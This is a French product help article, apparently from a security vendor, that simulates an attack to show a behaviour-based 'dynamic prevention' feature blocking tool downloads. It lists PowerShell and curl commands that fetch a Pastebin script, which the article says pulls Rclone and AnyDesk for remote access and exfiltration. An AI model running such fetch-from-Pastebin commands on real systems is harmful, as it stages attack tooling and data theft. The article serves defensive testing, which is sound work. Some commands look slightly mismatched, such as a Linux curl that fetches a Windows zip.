La prévention dynamique est un moteur de sécurité basé sur le comportement qui applique de manière proactive des contrôles dynamiques en réponse aux menaces détectées pour réduire la surface d'attaque et atténuer les menaces tôt, avant que tout impact ne se produise. Pour plus d'informations, consultez Qu'est-ce que la Prévention Dynamique ?
Cet article simule un scénario d'attaque réel pour démontrer comment la prévention dynamique protège votre réseau. Dans cet exemple, un utilisateur télécharge un script depuis Pastebin qu'un attaquant utilise pour tenter de récupérer des outils supplémentaires à haut risque nécessaires pour mener une attaque future. La prévention dynamique identifie le comportement malveillant et empêche le téléchargement de l'outil, prévenant l'attaque avant qu'elle ne progresse ou qu'un impact quelconque ne se produise.
La réponse à cette attaque est entièrement automatisée. Aucune règle supplémentaire n'est requise. Activer simplement la prévention dynamique suffit à empêcher l'attaque.
Pour simuler cette attaque :
- Téléchargez un outil à haut risque sans être bloqué
- Téléchargez le script depuis Pastebin
- Essayez de télécharger à nouveau les outils à haut risque. Cette fois, le téléchargement est bloqué.
Pour démontrer que la prévention dynamique bloque les actions uniquement lorsqu'elles font partie d'une séquence malveillante, téléchargez d'abord Rclone, un outil en ligne de commande open-source pour gérer les fichiers. Les attaquants utilisent couramment Rclone comme outil post-compromission car il est légitime, puissant et se fond dans l'activité administrative normale.
Téléchargez Rclone depuis l'un des sites suivants :
- L'URL suivante :
https://downloads.rclone.org/rclone-current-windows-amd64.zip -
Sur les appareils Windows :
- La commande PowerShell suivante :
Open-InBrowser -Url "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -Label "RClone"
- La commande PowerShell suivante :
-
Sur les appareils macOS/Linux :
- La commande Terminal suivante :
curl -sSL "https://downloads.rclone.org/rclone-current-windows-amd64.zip"
- La commande Terminal suivante :
Pour simuler le début d'une attaque, téléchargez un script depuis Pastebin qui, une fois exécuté, télécharge des outils d'attaque courants, par exemple, Rclone et AnyDesk pour un accès à distance et l'exfiltration.
Téléchargez et exécutez le script depuis Pastebin :
-
Sur les appareils Windows :
- La commande PowerShell suivante :
(New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/C5VxKUpE')
- La commande PowerShell suivante :
-
Sur les appareils macOS/Linux :
- La commande Terminal suivante :
curl -sSL "https://pastebin.com/raw/tXhVK2V7"
- La commande Terminal suivante :
Le script s'exécute et télécharge les outils. Un contrôle dynamique est appliqué à l'hôte, ce qui est montré dans le Tableau de bord des menaces de sécurité dans le widget Hôte avec contrôles. Pour plus d'informations, voir Utilisation du Tableau de Bord des Menaces de Sécurité.
Dans l'attaque simulée, l'attaquant tente de télécharger Rclone. Cependant, parce que cette action suit l'activité suspecte de téléchargement du script depuis Pastebin et qu'un contrôle est appliqué, la prévention dynamique bloque le téléchargement de Rclone.
Téléchargez Rclone depuis l'un des sites suivants :
- L'URL suivante :
https://downloads.rclone.org/rclone-current-windows-amd64.zip -
Sur les appareils Windows :
- La commande PowerShell suivante :
Open-InBrowser -Url "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -Label "RClone"
- La commande PowerShell suivante :
-
Sur les appareils macOS/Linux :
- La commande Terminal suivante :
curl -sSL "https://downloads.rclone.org/rclone-current-windows-amd64.zip"
- La commande Terminal suivante :
Le téléchargement de ce fichier est bloqué par le contrôle. La menace atténuée est affichée dans le Tableau de bord des menaces de sécurité dans le widget Hôte avec menaces atténuées.
0 commentaire
Cet article n'accepte pas de commentaires.